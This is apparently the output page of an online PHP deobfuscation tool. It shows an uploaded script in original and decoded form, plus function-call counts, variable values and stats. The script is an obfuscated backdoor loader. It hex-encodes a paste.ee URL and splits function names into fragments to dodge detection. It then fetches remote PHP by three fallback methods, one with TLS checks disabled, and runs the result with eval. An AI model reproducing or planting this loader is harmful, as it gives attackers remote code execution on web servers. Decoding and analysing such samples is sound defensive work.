Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $hexUrl = '68747470733a2f2f70617374652e65652f642f7165433973'; function hex2str($..

Decoded Output download

<?php 
$hexUrl = '68747470733a2f2f70617374652e65652f642f7165433973'; 
 
function hex2str($hex) { 
    $str = ''; 
    for ($i = 0; $i < strlen($hex) - 1; $i += 2) { 
        $str .= chr(hexdec($hex[$i] . $hex[$i + 1])); 
    } 
    return $str; 
} 
 
$url = hex2str($hexUrl); 
 
function downloadWithFileGetContents($url) { 
    if (ini_get('a' . 'llow' . '_ur' . 'l_fo' . 'pe' . 'n')) { 
        return file_get_contents($url); 
    } 
    return false; 
} 
 
function downloadWithCurl($url) { 
    if (function_exists('c' . 'u' . 'rl' . '_i' . 'n' . 'i' . 't')) { 
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, $url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
        $data = curl_exec($ch); 
        curl_close($ch); 
        return $data; 
    } 
    return false; 
} 
 
function downloadWithFopen($url) { 
    $result = false; 
    if ($fp = fopen($url, 'r')) { 
        $result = ''; 
        while ($data = fread($fp, 8192)) { 
            $result .= $data; 
        } 
        fclose($fp); 
    } 
    return $result; 
} 
 
$phpScript = downloadWithFileGetContents($url); 
if ($phpScript === false) { 
    $phpScript = downloadWithCurl($url); 
} 
if ($phpScript === false) { 
    $phpScript = downloadWithFopen($url); 
} 
 
if ($phpScript === false) { 
    die("Gagal mendownload script PHP dari URL dengan semua metode."); 
} 
 
eval('?>' . $phpScript); 
?>

Did this file decode correctly?

Original Code

<?php
$hexUrl = '68747470733a2f2f70617374652e65652f642f7165433973';

function hex2str($hex) {
    $str = '';
    for ($i = 0; $i < strlen($hex) - 1; $i += 2) {
        $str .= chr(hexdec($hex[$i] . $hex[$i + 1]));
    }
    return $str;
}

$url = hex2str($hexUrl);

function downloadWithFileGetContents($url) {
    if (ini_get('a' . 'llow' . '_ur' . 'l_fo' . 'pe' . 'n')) {
        return file_get_contents($url);
    }
    return false;
}

function downloadWithCurl($url) {
    if (function_exists('c' . 'u' . 'rl' . '_i' . 'n' . 'i' . 't')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    }
    return false;
}

function downloadWithFopen($url) {
    $result = false;
    if ($fp = fopen($url, 'r')) {
        $result = '';
        while ($data = fread($fp, 8192)) {
            $result .= $data;
        }
        fclose($fp);
    }
    return $result;
}

$phpScript = downloadWithFileGetContents($url);
if ($phpScript === false) {
    $phpScript = downloadWithCurl($url);
}
if ($phpScript === false) {
    $phpScript = downloadWithFopen($url);
}

if ($phpScript === false) {
    die("Gagal mendownload script PHP dari URL dengan semua metode.");
}

eval('?>' . $phpScript);
?>

Function Calls

chr 24
hexdec 24
strlen 25
hex2str 1
ini_get 1
downloadWithFileGetContents 1

Variables

$i 48
$hex 68747470733a2f2f70617374652e65652f642f7165433973
$str https://paste.ee/d/qeC9s
$url https://paste.ee/d/qeC9s
$hexUrl 68747470733a2f2f70617374652e65652f642f7165433973

Stats

MD5 4caf085d610ce15468a474fbeee28a2a
Eval Count 0
Decode Time 183 ms